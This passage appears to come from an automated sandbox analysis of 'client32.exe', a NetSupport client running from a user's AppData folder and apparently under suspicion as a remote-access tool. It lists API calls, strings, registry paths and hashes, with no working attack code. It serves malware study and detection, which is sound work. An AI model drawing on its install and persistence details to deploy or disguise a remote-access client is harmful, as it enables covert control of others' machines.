                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile$ChangeCloseFindNotification
                                                                              • String ID: "
                                                                              • API String ID: 353575653-123907689
                                                                              • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                              • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,AB86ACF8,74DF2EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                              • String ID: Client$DisableGeolocation
                                                                              • API String ID: 3315423714-4166767992
                                                                              • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                              • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • TranslateMessage.USER32(?), ref: 11027850
                                                                              • DispatchMessageA.USER32(?), ref: 11027856
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                              • String ID: Exit Msgloop, quit=%d
                                                                              • API String ID: 3212272093-2210386016
                                                                              • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                              • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110179ED
                                                                                • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101792C
                                                                                • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017842
                                                                                • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                              • SetEvent.KERNEL32(00000318), ref: 11017A0D
                                                                              • GetTickCount.KERNEL32 ref: 11017A13
                                                                              Strings
                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                              • API String ID: 3804766296-4122679463
                                                                              • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                              • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ChangeCloseCreateFindNotificationThread__wcstoi64
                                                                              • String ID: *AutoICFConfig$Client
                                                                              • API String ID: 3838223534-59951473
                                                                              • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                              • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                              APIs
                                                                              • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                              • String ID: Push
                                                                              • API String ID: 1566154052-4278761818
                                                                              • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                              • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                              APIs
                                                                              • GetCommandLineA.KERNEL32 ref: 00951027
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0095107B
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00951096
                                                                              • ExitProcess.KERNEL32 ref: 009510A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2968364486.0000000000951000.00000020.00000001.01000000.00000006.sdmp, Offset: 00950000, based on PE: true
                                                                              • Associated: 00000003.00000002.2968285369.0000000000950000.00000002.00000001.01000000.00000006.sdmp
                                                                              • Associated: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_950000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                              • String ID:
                                                                              • API String ID: 2164999147-0
                                                                              • Opcode ID: e4ae6f0343928b0474b9ea2854a4d99a6baad33831ae6a70ccb123245744aa88
                                                                              • Instruction ID: a3579aafe954900d275663e13cb4ab542ba3ad1310182b8a8f7c1f205472b9fd
                                                                              • Opcode Fuzzy Hash: e4ae6f0343928b0474b9ea2854a4d99a6baad33831ae6a70ccb123245744aa88
                                                                              • Instruction Fuzzy Hash: F111AD204083C45AEB31DF7288487FABFA99B02383F640448ECD6961C6D35648CFC7A5
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, xrefs: 11144804, 11144812
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentFileModuleNameProcess
                                                                              • String ID: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                              • API String ID: 2251294070-1846808567
                                                                              • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                              • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 11110262
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                              • API String ID: 2803934178-2363596943
                                                                              • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                              • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: \\.\NSWFPDrv
                                                                              • API String ID: 3498533004-85019792
                                                                              • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                              • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                              • __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,01611D68,?,00000001,00000001), ref: 1109EDC3
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111F1908,AB86ACF8,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                              • EnterCriticalSection.KERNEL32(111F1908,AB86ACF8,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                              • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ??CTL32.DLL
                                                                              APIs
                                                                              • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DriveType
                                                                              • String ID: ?:\
                                                                              APIs
                                                                                • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CloseOpenwvsprintf
                                                                              • String ID: Error %d Opening regkey %s
                                                                              APIs
                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Closewvsprintf
                                                                              • String ID: Error %d closing regkey %x
                                                                              • API String ID: 843752472-892920262
                                                                              • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                              • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,0157B888,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleLibraryLoadModule
                                                                              • String ID: NSMTRACE
                                                                              • API String ID: 4133054770-4175627554
                                                                              • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                              • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              • API String ID: 1029625771-80456845
                                                                              • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                              • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: nslsp.dll
                                                                              • API String ID: 1029625771-3933918195
                                                                              • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                              • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110750EF
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary_memset
                                                                              • String ID:
                                                                              • API String ID: 1654520187-0
                                                                              • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                              • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 110608C3
                                                                              • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID:
                                                                              • API String ID: 1338273076-0
                                                                              • Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                              • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                              • Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                              • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memmove
                                                                              • String ID:
                                                                              • API String ID: 1183979061-0
                                                                              • Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                              • Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110886DF
                                                                              • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
